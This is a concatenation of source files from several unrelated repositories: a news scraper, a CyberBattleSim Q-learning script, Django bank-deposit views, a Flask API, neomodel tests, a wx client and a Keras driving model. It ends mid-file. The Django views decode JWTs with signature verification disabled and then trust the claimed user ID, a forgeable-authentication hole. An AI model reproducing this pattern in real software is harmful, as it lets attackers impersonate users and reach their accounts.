parser_content = BeautifulSoup(html, 'html5lib')
return parser_content
# We are looking for the author information at places where it can often be found.
# If we do not find it, it does not mean that it is not there.
def parse_author(html_content):
# Initialize variables
search_query = re.compile('author', re.IGNORECASE)
name = ""
# The author information might be encoded as a value of the attribute name
attribute = html_content.find('meta', attrs={'name': search_query})
# Or as a property
    prop = html_content.find('meta', property=search_query)  # avoid shadowing the built-in `property`
    found_author = attribute or prop
if found_author:
name = found_author['content']
# If the author name cannot be found in the metadata, we might find it as an attribute of the text.
else:
itemprop = html_content.find(attrs={'itemprop': 'author'})
byline = html_content.find(attrs={'class': 'byline'})
found_author = itemprop or byline
if found_author:
name = found_author.text
name = name.replace("by ", "")
name = name.replace("\n", "")
return name.strip()
#This function requires the HTML content of the result as an input parameter
#It returns the actual text content
def parse_news_text(html_content):
# Try to find Article Body by Semantic Tag
article = html_content.find('article')
# Otherwise, try to find Article Body by Class Name (with the largest number of paragraphs)
if not article:
articles = html_content.find_all(class_=re.compile('(body|article|main)', re.IGNORECASE))
if articles:
article = sorted(articles, key=lambda x: len(x.find_all('p')), reverse=True)[0]
# Parse text from all Paragraphs
text = []
if article:
for paragraph in [tag.text for tag in article.find_all('p')]:
if re.findall("[.,!?]", paragraph):
text.append(paragraph)
text = re.sub(r"\s+", " ", " ".join(text))
return text
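# Example flow (hypothetical URL, for illustration only):
#
#   html = url_to_html("https://example.com/some-article")
#   author = parse_author(html)
#   body = parse_news_text(html)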
def extract_metadata_googlenews(article):
# Extract the publication date
time = article.find('time')
base_url = "http://news.google.com/"
if time:
datetime = time.get('datetime')
date, time = datetime.split("T")
else:
date = ""
time = ""
# Discover the structure in the data
technical_data, title_html, publisher_html = article.find_all('a')
# Extract meta data
publisher = publisher_html.contents[0]
title = title_html.contents[0]
url = title_html.get('href')
# The URL is a redirect from the Google page. Let's re-create the original URL form this
article_redirect = base_url + url
article_url = requests.get(article_redirect).url
return date, time, publisher, title, article_url
``` |
{
"source": "jonabox/CyberBattleSim",
"score": 2
} |
#### File: CyberBattleSim/server/script.py
```python
import sys
import logging
from typing import cast
import gym
import numpy as np
import matplotlib.pyplot as plt # type:ignore
from cyberbattle.agents.baseline.learner import TrainedLearner
import cyberbattle.agents.baseline.plotting as p
import cyberbattle.agents.baseline.agent_wrapper as w
import cyberbattle.agents.baseline.agent_tabularqlearning as a
from cyberbattle.agents.baseline.agent_wrapper import Verbosity
import cyberbattle.agents.baseline.learner as learner
from cyberbattle._env.cyberbattle_env import AttackerGoal
logging.basicConfig(stream=sys.stdout, level=logging.ERROR, format="%(levelname)s: %(message)s")
# Benchmark parameters:
# Parameters from DeepDoubleQ paper
# - learning_rate = 0.00025
# - linear epsilon decay
# - gamma = 0.99
# Eliminated gamma_values
# 0.0,
# 0.0015, # too small
# 0.15, # too big
# 0.25, # too big
# 0.35, # too big
#
# NOTE: Given the relatively low number of training episodes (50),
# a high learning rate of 0.99 gives better results
# than a lower learning rate of 0.25 (i.e. maximal rewards reached faster on average).
# Ideally we should decay the learning rate just like gamma and train over a
# much larger number of episodes
cyberbattlechain_10 = gym.make('CyberBattleChain-v0', attacker_goal=AttackerGoal(own_atleast_percent=1.0))
ep = w.EnvironmentBounds.of_identifiers(
maximum_node_count=12,
maximum_total_credentials=12,
identifiers=cyberbattlechain_10.identifiers
)
iteration_count = 9000
training_episode_count = 5
eval_episode_count = 5
gamma_sweep = [
0.015, # about right
]
def qlearning_run(gamma, gym_env):
"""Execute one run of the q-learning algorithm for the
specified gamma value"""
return learner.epsilon_greedy_search(
gym_env,
ep,
a.QTabularLearner(ep, gamma=gamma, learning_rate=0.90, exploit_percentile=100),
episode_count=training_episode_count,
iteration_count=iteration_count,
epsilon=0.90,
render=False,
epsilon_multdecay=0.75, # 0.999,
epsilon_minimum=0.01,
verbosity=Verbosity.Quiet,
title="Q-learning"
)
# Run Q-learning with gamma-sweep
qlearning_results = [qlearning_run(gamma, cyberbattlechain_10) for gamma in gamma_sweep]
qlearning_bestrun_10 = qlearning_results[0]
p.new_plot_loss()
for results in qlearning_results:
p.plot_all_episodes_loss(cast(a.QTabularLearner, results['learner']).loss_qsource.all_episodes, 'Q_source', results['title'])
p.plot_all_episodes_loss(cast(a.QTabularLearner, results['learner']).loss_qattack.all_episodes, 'Q_attack', results['title'])
plt.legend(loc="upper right")
plt.show()
``` |
{
"source": "JonaCaste/Banco-Django",
"score": 2
} |
#### File: authApp/serializers/depositSerializer.py
```python
from authApp.models.account import Account
from authApp.models.deposit import Deposit
from authApp.models.user import User
from rest_framework import serializers
class DepositSerializer(serializers.ModelSerializer):
class Meta:
model = Deposit
fields = ['account', 'amount', 'register_date', 'note', 'depositer_name']
def to_representation(self, obj):
account = Account.objects.get(id=obj.account_id)
user = User.objects.get(id=account.user_id)
        deposit = Deposit.objects.get(id=obj.id)
        return {
            'id' : deposit.id,
            'amount' : deposit.amount,
            'register_date' : deposit.register_date,
            'note' : deposit.note,
            'depositer_name' : deposit.depositer_name,
'account' : {
'id' : account.id,
'isActive' : account.isActive
},
'user' : {
'id' : user.id,
'name' : user.name,
'email' : user.email
}
}
```
#### File: authApp/views/depositView.py
```python
from django.conf import settings
from rest_framework import generics, status
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated
from rest_framework_simplejwt.backends import TokenBackend
from authApp.models.deposit import Deposit
from authApp.models.account import Account
from authApp.serializers.depositSerializer import DepositSerializer
from authApp.serializers.accountSerializer import AccountSerializer
class DepositDetailView(generics.RetrieveAPIView):
serializer_class = DepositSerializer
permission_classes = (IsAuthenticated,)
queryset = Deposit.objects.all()
def get(self, request, *args, **kwargs):
token = request.META.get('HTTP_AUTHORIZATION')[7:]
tokenBackend = TokenBackend(algorithm=settings.SIMPLE_JWT['ALGORITHM'])
valid_data = tokenBackend.decode(token,verify=False)
if valid_data['user_id'] != kwargs['user']:
stringResponse = {'detail':'Unauthorized Request'}
return Response(stringResponse, status=status.HTTP_401_UNAUTHORIZED)
return super().get(request, *args, **kwargs)
class DepositsAccountView(generics.ListAPIView):
serializer_class = DepositSerializer
permission_classes = (IsAuthenticated,)
def get_queryset(self):
token = self.request.META.get('HTTP_AUTHORIZATION')[7:]
tokenBackend = TokenBackend(algorithm=settings.SIMPLE_JWT['ALGORITHM'])
valid_data = tokenBackend.decode(token,verify=False)
        if valid_data['user_id'] != self.kwargs['user']:
            # get_queryset cannot return a Response object; raising the DRF
            # exception lets the framework still produce a 401 error body.
            raise AuthenticationFailed('Unauthorized Request')
queryset = Deposit.objects.filter(account_id=self.kwargs['account'])
return queryset
class DepositCreateView(generics.CreateAPIView):
serializer_class = DepositSerializer
permission_classes = (IsAuthenticated,)
def post(self, request, *args, **kwargs):
token = request.META.get('HTTP_AUTHORIZATION')[7:]
tokenBackend = TokenBackend(algorithm=settings.SIMPLE_JWT['ALGORITHM'])
valid_data = tokenBackend.decode(token,verify=False)
if valid_data['user_id'] != request.data['user_id']:
stringResponse = {'detail':'Unauthorized Request'}
return Response(stringResponse, status=status.HTTP_401_UNAUTHORIZED)
serializer = DepositSerializer(data=request.data['deposit_data'])
serializer.is_valid(raise_exception=True)
serializer.save()
account = Account.objects.get(id=request.data['deposit_data']['account'])
account.balance += request.data['deposit_data']['amount']
account.save()
return Response("Consignación exitosa", status=status.HTTP_201_CREATED)
``` |
{
"source": "jonadaly/brood-backend",
"score": 2
} |
#### File: brood-backend/brood_backend/api.py
```python
from connexion import request
from flask import jsonify
from brood_backend.controllers import (
peck_controller,
chicken_controller,
brood_controller,
)
def get_brood_by_id(brood_id: str):
return jsonify(brood_controller.get_brood_by_uuid(brood_id))
def create_peck():
_json = request.get_json()
return jsonify(peck_controller.create_peck(_json))
def create_chicken():
_json = request.get_json()
return jsonify(chicken_controller.create_chicken(_json))
def create_brood():
_json = request.get_json()
return jsonify(brood_controller.create_brood(_json))
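
# These handlers are dispatched by Connexion from the project's OpenAPI spec
# (not shown here); a sketch of what one such spec entry is assumed to look
# like, with the operationId pointing at the function above:
# paths:
#   /broods/{brood_id}:
#     get:
#       operationId: brood_backend.api.get_brood_by_id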
```
#### File: brood_backend/controllers/chicken_controller.py
```python
from uuid import uuid4
from loguru import logger
from brood_backend.database import db
from brood_backend.helpers.errors import EntityNotFoundException
from brood_backend.models.brood import Brood
from brood_backend.models.chicken import Chicken
def create_chicken(data: dict) -> dict:
logger.debug(f"Creating Chicken from data: {data}")
brood_uuid: str = data["brood_uuid"]
brood = Brood.query.filter_by(uuid=brood_uuid).first()
if brood is None:
raise EntityNotFoundException(f"Unknown chicken UUID '{brood_uuid}'")
chicken = Chicken()
chicken.uuid = str(uuid4())
chicken.name = data["name"]
chicken.brood_uuid = brood_uuid
logger.debug(f"Saving into database")
db.session.add(chicken)
db.session.commit()
logger.debug(f"Responding with data: {chicken.to_dict()}")
return chicken.to_dict()
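
# Hypothetical usage -- the payload keys match what create_chicken reads above:
# create_chicken({"brood_uuid": "9b2e...", "name": "Henrietta"})
# returns Chicken.to_dict() on success, or raises EntityNotFoundException
# for an unknown brood_uuid.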
```
#### File: brood_backend/helpers/errors.py
```python
import sys
import traceback
import flask
from loguru import logger
def init_error_handler(app):
app.errorhandler(ValueError)(_catch_bad_request)
app.errorhandler(KeyError)(_catch_bad_request)
app.errorhandler(TypeError)(_catch_bad_request)
app.errorhandler(PermissionError)(_catch_unauthorised)
app.errorhandler(EntityNotFoundException)(_catch_not_found)
app.errorhandler(ServiceUnavailableException)(_catch_upstream)
def _catch_bad_request(error):
return _catch(error, logger.warning, 400)
def _catch_internal_error(error):
return _catch(error, logger.critical, 500)
def _catch_not_found(error):
return _catch(error, logger.warning, 404)
def _catch_unauthorised(_error):
return _catch("Forbidden", logger.error, 403)
def _catch_upstream(error):
return _catch(error, logger.error, 502)
def _catch(error, log_method, code):
exc_type, exc_value, exc_traceback = sys.exc_info()
log_method("".join(traceback.format_exception(exc_type, exc_value, exc_traceback)))
structure = {"message": str(error)}
return flask.jsonify(structure), code
class EntityNotFoundException(Exception):
pass
class ServiceUnavailableException(Exception):
pass
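
# Sketch of how an app opts into these handlers (assuming a plain Flask or
# Connexion-created app object named `app`):
# init_error_handler(app)
# Raising EntityNotFoundException in any controller then yields a JSON
# {"message": ...} body with status 404, and likewise for the other mappings.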
```
#### File: brood_backend/models/brood.py
```python
from datetime import datetime
from brood_backend.database import db
class Brood(db.Model):
uuid = db.Column(db.String(length=36), primary_key=True)
created = db.Column(
db.DateTime, unique=False, nullable=False, default=datetime.utcnow
)
name = db.Column(db.String(), unique=False, nullable=False)
hashed_password = db.Column(db.String(), unique=False, nullable=False)
chickens = db.relationship("Chicken", back_populates="brood")
def to_dict(self) -> dict:
return {
"uuid": self.uuid,
"created": self.created,
"name": self.name,
"chickens": sorted([c.to_dict() for c in self.chickens], key=lambda x: x["created"]),
}
``` |
{
"source": "jonadaly/neomodel",
"score": 2
} |
#### File: neomodel/test/test_relationship_models.py
```python
from datetime import datetime
from pytest import raises
import pytz
from neomodel import (StructuredNode, StructuredRel, Relationship, RelationshipTo,
StringProperty, DateTimeProperty, DeflateError)
HOOKS_CALLED = {
'pre_save': 0,
'post_save': 0
}
class FriendRel(StructuredRel):
since = DateTimeProperty(default=lambda: datetime.now(pytz.utc))
class HatesRel(FriendRel):
reason = StringProperty()
def pre_save(self):
HOOKS_CALLED['pre_save'] += 1
def post_save(self):
HOOKS_CALLED['post_save'] += 1
class Badger(StructuredNode):
name = StringProperty(unique_index=True)
friend = Relationship('Badger', 'FRIEND', model=FriendRel)
hates = RelationshipTo('Stoat', 'HATES', model=HatesRel)
class Stoat(StructuredNode):
name = StringProperty(unique_index=True)
hates = RelationshipTo('Badger', 'HATES', model=HatesRel)
def test_either_connect_with_rel_model():
paul = Badger(name="Paul").save()
tom = Badger(name="Tom").save()
# creating rels
new_rel = tom.friend.disconnect(paul)
new_rel = tom.friend.connect(paul)
assert isinstance(new_rel, FriendRel)
assert isinstance(new_rel.since, datetime)
# updating properties
new_rel.since = datetime.now(pytz.utc)
assert isinstance(new_rel.save(), FriendRel)
# start and end nodes are the opposite of what you'd expect when using either..
# I've tried everything possible to correct this to no avail
paul = new_rel.start_node()
tom = new_rel.end_node()
assert paul.name == 'Paul'
assert tom.name == 'Tom'
def test_direction_connect_with_rel_model():
paul = Badger(name="<NAME>").save()
ian = Stoat(name="Ian the stoat").save()
rel = ian.hates.connect(paul, {'reason': "thinks paul should bath more often"})
assert isinstance(rel.since, datetime)
assert isinstance(rel, FriendRel)
assert rel.reason.startswith("thinks")
rel.reason = 'he smells'
rel.save()
ian = rel.start_node()
assert isinstance(ian, Stoat)
paul = rel.end_node()
assert isinstance(paul, Badger)
assert ian.name.startswith("Ian")
assert paul.name.startswith("Paul")
rel = ian.hates.relationship(paul)
assert isinstance(rel, HatesRel)
assert isinstance(rel.since, datetime)
rel.save()
# test deflate checking
rel.since = "2:30pm"
with raises(DeflateError):
rel.save()
# check deflate check via connect
with raises(DeflateError):
paul.hates.connect(ian, {'reason': "thinks paul should bath more often", 'since': '2:30pm'})
def test_traversal_where_clause():
phill = Badger(name="<NAME>").save()
tim = Badger(name="<NAME>").save()
bob = Badger(name="<NAME>").save()
rel = tim.friend.connect(bob)
now = datetime.now(pytz.utc)
assert rel.since < now
rel2 = tim.friend.connect(phill)
assert rel2.since > now
friends = tim.friend.match(since__gt=now)
assert len(friends) == 1
def test_multiple_rels_exist_issue_223():
# check a badger can dislike a stoat for multiple reasons
phill = Badger(name="Phill").save()
ian = Stoat(name="Stoat").save()
rel_a = phill.hates.connect(ian, {'reason': 'a'})
rel_b = phill.hates.connect(ian, {'reason': 'b'})
assert rel_a.id != rel_b.id
ian_a = phill.hates.match(reason='a')[0]
ian_b = phill.hates.match(reason='b')[0]
assert ian_a.id == ian_b.id
def test_retrieve_all_rels():
tom = Badger(name="tom").save()
ian = Stoat(name="ian").save()
rel_a = tom.hates.connect(ian, {'reason': 'a'})
rel_b = tom.hates.connect(ian, {'reason': 'b'})
rels = tom.hates.all_relationships(ian)
assert len(rels) == 2
assert rels[0].id in [rel_a.id, rel_b.id]
assert rels[1].id in [rel_a.id, rel_b.id]
def test_save_hook_on_rel_model():
HOOKS_CALLED['pre_save'] = 0
HOOKS_CALLED['post_save'] = 0
paul = Badger(name="PaulB").save()
ian = Stoat(name="IanS").save()
rel = ian.hates.connect(paul, {'reason': "yadda yadda"})
rel.save()
assert HOOKS_CALLED['pre_save'] == 2
assert HOOKS_CALLED['post_save'] == 2
``` |
{
"source": "jonadar/Final-project",
"score": 2
} |
#### File: Final-project/client/client.py
```python
import wx, socket, time, os
from threading import Thread
class MainFrame(wx.Frame):
def __init__(self, parent, title):
super(MainFrame, self).__init__(parent, title=title)
self.Maximize()
self.Centre()
self.Show()
self.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.NORMAL, False,'MS Shell Dlg 2'))
#--chat--#
self.SND_BTN = wx.Button(self,size=(110,40), label='Send',pos=(300,40))
self.SND_BTN.SetWindowStyleFlag(wx.NO_BORDER)
self.SND_BTN.SetBackgroundColour((32,190,208))
self.Entery = wx.TextCtrl(self, size=(280,40), pos=(10,40), value='enter here!')
self.Chat_body = wx.ListCtrl(self, size=(400,600), pos=(10,90), style=wx.LC_REPORT|wx.BORDER_SUNKEN)
self.index=0
self.Chat_body.InsertColumn(0, 'Name')
self.Chat_body.InsertColumn(1, 'Message')
#self.Chat_body.SetColumnWidth(1, 80)
self.Chat_body.InsertColumn(2, 'Time')
#--file--#
self.UPLD_BTN = wx.Button(self,size=(110,40), label='Upload',pos=(425,40))
self.UPLD_BTN.SetWindowStyleFlag(wx.NO_BORDER)
self.UPLD_BTN.SetBackgroundColour((32,190,208))
self.REFRSH_BTN = wx.Button(self,size=(110,40), label=u'\u21bb',pos=(545,40))
self.REFRSH_BTN.SetFont(wx.Font(24, wx.SWISS, wx.NORMAL, wx.NORMAL, False,'MS Shell Dlg 2'))
self.REFRSH_BTN.SetWindowStyleFlag(wx.NO_BORDER)
self.REFRSH_BTN.SetBackgroundColour((32,190,208))
self.File_body = wx.ListCtrl(self, size=(400,600), pos=(425,90), style=wx.LC_REPORT|wx.BORDER_SUNKEN)
self.index=0
self.File_body.InsertColumn(0, 'Last changed by')
self.File_body.InsertColumn(1, 'File name')
self.File_body.InsertColumn(2, 'File type')
if __name__ == '__main__':
app = wx.App()
MainFrame(None, 'Main')
app.MainLoop()
``` |
{
"source": "jonad/Behavioral_Cloning",
"score": 3
} |
#### File: jonad/Behavioral_Cloning/training.py
```python
import os
import csv
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
import cv2
from keras.models import Sequential
from keras.layers import Flatten, Dense, Lambda, Conv2D, MaxPooling2D, Cropping2D, Dropout
import pickle
from keras.callbacks import TensorBoard, ModelCheckpoint
BASE_DIR = '/home/workspace/CarND-Behavioral-Cloning-P3/img'
def get_data(filename):
samples = []
with open(os.path.join(BASE_DIR, filename)) as csvfile:
reader = csv.reader(csvfile)
for line in reader:
samples.append(line)
samples = samples[1:]
print('The dataset is {} records'.format(len(samples)))
train_samples, validation_samples = train_test_split(samples, test_size=0.2)
return train_samples, validation_samples
def generator(samples, batch_size=32):
num_samples = len(samples)
while True:
shuffle(samples)
for offset in range(0, num_samples, batch_size):
batch_samples = samples[offset:offset+batch_size]
images = []
angles = []
for batch_sample in batch_samples:
name = BASE_DIR + '/IMG/'+ batch_sample[0].split('/')[-1]
image = cv2.imread(name)
angle = float(batch_sample[1])
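                # Augment: horizontally flip the frame and negate the steering
                # angle, which doubles the effective batch size per yield.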
augmented_image = cv2.flip(image, 1)
augmented_angle = angle*-1.0
images.append(image)
angles.append(angle)
images.append(augmented_image)
angles.append(augmented_angle)
X_train = np.array(images)
y_train = np.array(angles)
yield shuffle(X_train, y_train)
def train(train_samples, validation_samples, callbacks_list):
train_generator = generator(train_samples, batch_size=32)
validation_generator = generator(validation_samples, batch_size=32)
model = Sequential()
model.add(Lambda(lambda x: (x / 255.0) - 0.5,input_shape=(160,320,3) ))
model.add(Cropping2D(cropping=((70,25), (0,0))))
model.add(Conv2D(24, (5, 5), subsample=(2,2), activation='relu'))
model.add(Conv2D(36,(5, 5), subsample=(2,2), activation='relu'))
model.add(Conv2D(48,(5, 5), subsample=(2,2), activation='relu'))
model.add(Conv2D(64,(3, 3), activation='relu'))
model.add(Conv2D(64,(3, 3), activation='relu'))
model.add(Flatten())
model.add(Dense(100))
model.add(Dropout(0.2))
model.add(Dense(50))
model.add(Dropout(0.2))
model.add(Dense(10))
model.add(Dropout(0.2))
model.add(Dense(1))
model.compile(loss='mse', optimizer='adam')
    # steps_per_epoch/validation_steps count batches, not samples, so divide
    # the sample counts by the generator batch size (32 here).
    history = model.fit_generator(train_generator,
                          steps_per_epoch=int(np.ceil(len(train_samples) / 32)),
                          validation_data=validation_generator,
                          validation_steps=int(np.ceil(len(validation_samples) / 32)),
                          epochs=5, verbose=1, callbacks=callbacks_list)
with open('./history.pickle', 'wb') as file_pi:
pickle.dump(history.history, file_pi)
if __name__ == '__main__':
filename = 'driving.csv'
train_samples, validation_samples = get_data(filename)
callback_list = [ModelCheckpoint(filepath='model_final.h5',
monitor='val_loss',
save_best_only=True),
TensorBoard(log_dir='./logs', histogram_freq=0,
write_graph=True, write_images=False)]
train(train_samples, validation_samples, callback_list)
``` |
{
"source": "jonadiazz/spamFilterApp",
"score": 4
} |
#### File: jonadiazz/spamFilterApp/spamFilterApp copy.py
```python
import Tkinter as tk # gives tk namespace
def add_item():
"""
add the text in the Entry widget to the end of the listbox
"""
listbox1.insert(tk.END, enter1.get())
def delete_item():
"""
delete a selected line from the listbox
"""
try:
# get selected line index
index = listbox1.curselection()[0]
listbox1.delete(index)
except IndexError:
pass
def get_list(event):
"""
function to read the listbox selection
and put the result in an entry widget
"""
# get selected line index
index = listbox1.curselection()[0]
# get the line's text
seltext = listbox1.get(index)
# delete previous text in enter1
enter1.delete(0, 50)
# now display the selected text
enter1.insert(0, seltext)
def set_list(event):
"""
insert an edited line from the entry widget
back into the listbox
"""
try:
index = listbox1.curselection()[0]
# delete old listbox line
listbox1.delete(index)
except IndexError:
index = tk.END
# insert edited item back into listbox1 at index
listbox1.insert(index, enter1.get())
def sort_list():
"""
function to sort listbox items case insensitive
"""
temp_list = list(listbox1.get(0, tk.END))
temp_list.sort(key=str.lower)
# delete contents of present listbox
listbox1.delete(0, tk.END)
# load listbox with sorted data
for item in temp_list:
listbox1.insert(tk.END, item)
def save_list():
"""
save the current listbox contents to a file
"""
# get a list of listbox lines
temp_list = list(listbox1.get(0, tk.END))
# add a trailing newline char to each line
temp_list = [chem + '\n' for chem in temp_list]
# give the file a different name
fout = open("chem_data2.txt", "w")
fout.writelines(temp_list)
fout.close()
# create the sample data file
str1 = """ethyl alcohol
ethanol
ethyl hydroxide
hydroxyethane
methyl hydroxymethane
ethoxy hydride
gin
bourbon
rum
schnaps
"""
fout = open("chem_data.txt", "w")
fout.write(str1)
fout.close()
# read the data file into a list
fin = open("chem_data.txt", "r")
chem_list = fin.readlines()
fin.close()
# strip the trailing newline char
chem_list = [chem.rstrip() for chem in chem_list]
root = tk.Tk()
root.title("Listbox Operations")
# create the listbox (note that size is in characters)
listbox1 = tk.Listbox(root, width=50, height=6)
listbox1.grid(row=0, column=0)
# create a vertical scrollbar to the right of the listbox
yscroll = tk.Scrollbar(command=listbox1.yview, orient=tk.VERTICAL)
yscroll.grid(row=0, column=1, sticky=tk.N+tk.S)
listbox1.configure(yscrollcommand=yscroll.set)
# use entry widget to display/edit selection
enter1 = tk.Entry(root, width=50, bg='yellow')
enter1.insert(0, 'Click on an item in the listbox')
enter1.grid(row=1, column=0)
# pressing the return key will update edited line
enter1.bind('<Return>', set_list)
# or double click left mouse button to update line
enter1.bind('<Double-1>', set_list)
# button to sort listbox
button1 = tk.Button(root, text='Sort the listbox ', command=sort_list)
button1.grid(row=2, column=0, sticky=tk.W)
# button to save the listbox's data lines to a file
button2 = tk.Button(root, text='Save lines to file', command=save_list)
button2.grid(row=3, column=0, sticky=tk.W)
# button to add a line to the listbox
button3 = tk.Button(root, text='Add entry text to listbox', command=add_item)
button3.grid(row=2, column=0, sticky=tk.E)
# button to delete a line from listbox
button4 = tk.Button(root, text='Delete selected line ', command=delete_item)
button4.grid(row=3, column=0, sticky=tk.E)
# load the listbox with data
for item in chem_list:
listbox1.insert(tk.END, item)
# left mouse click on a list item to display selection
listbox1.bind('<ButtonRelease-1>', get_list)
root.mainloop()
``` |
{
"source": "jonadmark/repd",
"score": 3
} |
#### File: diagnostic/diagnoser_manager/__init__.py
```python
class DiagnoserManager:
def __init__(self, metric_manager, diagnosers):
"""Form a DiagnoserManager.
Arguments:
metric_manager -- a reference to a MetricManager
diagnosers -- list of diagnoser names
"""
self.metric_manager = metric_manager
self.diagnosers = {}
for diagnoser in diagnosers:
self.add(diagnoser)
def add(self, diagnoser_id):
"""Add a diagnoser to be managed."""
if diagnoser_id not in self.diagnosers:
module = __import__(__name__+'.'+diagnoser_id, globals(),
locals(), [diagnoser_id], 0)
diagnoser = getattr(module, diagnoser_id)
self.diagnosers[diagnoser_id] = diagnoser(self.metric_manager)
else:
raise KeyError
def remove(self, diagnoser_id):
"""Remove a managed diagnoser."""
del self.diagnosers[diagnoser_id]
def diagnose(self, interval):
"""Make diagnosers diagnose and return a list of their diagbostics."""
diagnostics = []
for id in sorted(self.diagnosers):
diagnostics.append(self.diagnosers[id].diagnose(interval))
return diagnostics
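
# Hypothetical wiring (names illustrative): the manager imports each listed
# diagnoser module by name and fans out diagnose() calls to all of them:
# dm = DiagnoserManager(metric_manager, ['pfitscher_network'])
# diagnostics = dm.diagnose(interval)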
```
#### File: diagnostic/diagnoser_manager/pfitscher_network.py
```python
import diagnostic
class pfitscher_network:
def __init__(self, metric_manager):
"""Form the diagnoser"""
self.mm = metric_manager
self.t_queue_high = 0.0
self.t_tr_high = 5.0
def diagnose(self, interval):
"""Perform the diagnostic and return it"""
v_queue_mean = self.mm.get_reduced_metric('network',
'queue',
('mean', ),
interval)
v_tr_stdev = self.mm.get_reduced_metric('network',
'transmission_rate',
('stdev', ),
interval)
v_tr_mean = self.mm.get_reduced_metric('network',
'transmission_rate',
('mean', ),
interval)
if v_tr_stdev is not None and v_tr_mean is not None:
if v_tr_mean != 0.0:
v_tr_cv = v_tr_stdev / v_tr_mean
else:
v_tr_cv = float('inf')
else:
v_tr_cv = None
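        # v_tr_cv is the coefficient of variation (stdev/mean) of the
        # transmission rate; a large value signals bursty traffic and is
        # compared against t_tr_high below.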
diag = diagnostic.Diagnostic(diagnoser='pfitscher_network',
resource='network')
if v_queue_mean is None or v_tr_cv is None:
diag.diagnostic = None
elif v_queue_mean > self.t_queue_high:
diag.diagnostic = diagnostic.UNDER
elif v_tr_cv > self.t_tr_high:
diag.diagnostic = diagnostic.OVER
else:
diag.diagnostic = diagnostic.CORRECT
if diag.diagnostic is not None:
diag.info = self.make_info(v_queue_mean, v_tr_cv)
return diag
def make_info(self, v_queue_mean, v_tr_cv):
"""Generate a info message to the diagnostic"""
info = '\n - average queue size: %.2f packets'
info += '\n - CV for transmission rate: %.2f'
return info % (v_queue_mean, v_tr_cv)
```
#### File: repd/src/repdd.py
```python
import json
import time
from database import Database
from metric.metric_manager import MetricManager
from metric.monitor_manager import MonitorManager
def main():
# load database settings and create handler
with open('settings/database.cfg', 'r') as f:
s = json.load(f)
database = Database(s['filename'], s['timetoexpire'])
# create MetricManager
metric_manager = MetricManager(database)
# load monitor_manager settings and create object
with open('settings/monitor_manager.cfg', 'r') as s:
resources = json.load(s)
monitor_manager = MonitorManager(metric_manager, resources)
try:
monitor_manager.start()
while True:
print('Press control-c to quit')
time.sleep(3600)
except KeyboardInterrupt:
print('\rQuitting, this may take a while')
monitor_manager.stop()
if __name__ == '__main__':
main()
``` |
{
"source": "jonadsimon/wonder-words-generator",
"score": 2
} |
#### File: jonadsimon/wonder-words-generator/minizinc_output_to_imputed_board.py
```python
def parse_minizinc_output():
board_raw = """P I N A T A P A N E R A S M L B V N
O Y A V E E U R O P E O E O R E I F
B Z C E M S L U R P R Z N U N B E R
L Z H N P E Q E J B C D L I B C N A
E I O T E P U A E A O E C L O O N N
T F S E H C E T L N E E E F T S A C
F R E S C A R P L O Q C F O C M V E
R A H S C O N E S U C E R A E O C C
O P C E T E G E A I E T C E D E O R
T P E A U A T R I M A A A K M V R E
H E L D B A T H C E O M A P E E K M
Y E N U H S Q U E S O H E N A E S A
G O C C E Y G O D R S F T V I S T F
F A T T E O T S K I F I A A O M O L
T A T K N I U N W A E J H D E I F A
M A R G J G I S C D E C A F E L U N
L U G O E R U M B A O T I L A K E E
T E M N D A I R Y M P I N T E E E E"""
word_lens_raw = """4 4 4 4 4 4 4 4 4 4 4 4 4 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6"""
pos_ys_raw = """14 13 16 11 4 13 13 10 17 16 8 15 18 18 16 10 11 3 16 16 9 16 8 6 12 11 8 7 7 9 7 7 17 6 6 5 18 18 18 8 4 2 4 18 18 6 2 2 18 17 16 1 15 14 13 7 1 7 1 1 1 1 1 1 1 1 1 1 1"""
pos_xs_raw = """16 16 12 12 9 18 17 9 12 12 11 12 11 10 10 16 5 6 9 9 12 8 18 2 7 3 17 12 17 6 15 11 6 15 6 6 5 5 4 4 16 4 16 3 2 2 6 18 1 1 1 17 1 1 1 1 7 1 18 17 16 3 15 14 13 7 5 1 1"""
delta_ys_raw = """1 1 -1 -1 1 1 1 1 0 0 -1 -1 0 -1 0 1 -1 0 -1 -1 1 -1 1 -1 0 -1 1 1 1 1 1 1 0 1 1 1 0 -1 -1 0 1 1 1 -1 -1 1 0 1 -1 -1 -1 1 -1 -1 -1 0 1 1 1 1 1 1 1 1 1 0 1 1 0"""
delta_xs_raw = """0 -1 1 0 0 0 0 0 1 1 -1 1 1 1 1 -1 1 1 1 1 1 1 0 0 1 0 0 1 -1 1 -1 -1 1 -1 1 1 1 1 1 1 0 0 -1 1 1 0 1 0 1 1 1 0 1 1 1 1 0 0 -1 -1 -1 0 -1 -1 -1 1 0 0 1"""
# Parse the inputs.
board = [row.split() for row in board_raw.split("\n")]
word_lens = [int(x) for x in word_lens_raw.split()]
pos_ys = [int(x) for x in pos_ys_raw.split()]
pos_xs = [int(x) for x in pos_xs_raw.split()]
delta_ys = [int(x) for x in delta_ys_raw.split()]
delta_xs = [int(x) for x in delta_xs_raw.split()]
# Generate a new zero'ed out board.
board_fresh = [["_" for _ in range(len(board))] for _ in range(len(board))]
for i,l in enumerate(word_lens):
for k in range(l):
y = pos_ys[i] - 1 + delta_ys[i]*k
x = pos_xs[i] - 1 + delta_xs[i]*k
board_fresh[y][x] = board[y][x]
for row in board_fresh:
print(" ".join(row))
print("\nLeftover squares:", sum([sum([1 for _ in row if _ == "_"]) for row in board_fresh]))
if __name__ == "__main__":
parse_minizinc_output()
# "happyholidays" - 13
# "merrychristmas" - 14
# "verymerrychristmas" - 18
# "icallitajonderword" - 18
# "merrychristmasmaria" - 19
# "haveamerrychristmas" - 19
# "doyoulikeyourpresent" - 20
# "mariachristmaspresent" - 21
# "mariaschristmaspresent" - 22
# "howdoyoulikeyourpresent" - 23
# "haveaverymerrychristmas" - 23
# "ihopeyoulikeyourpresent" - 23
# "doesmarialikeherpresent" - 23
# "thistookalongtimetomake" - 23
# "doyoulikeyourjonderword" - 23
# "mariadoyoulikethepresent" - 24
# "mariadoyoulikeyourpresent" - 25
# "whatdoyouthinkofyourpresent" - 27
```
#### File: jonadsimon/wonder-words-generator/semantic_neighbors.py
```python
import time
import requests
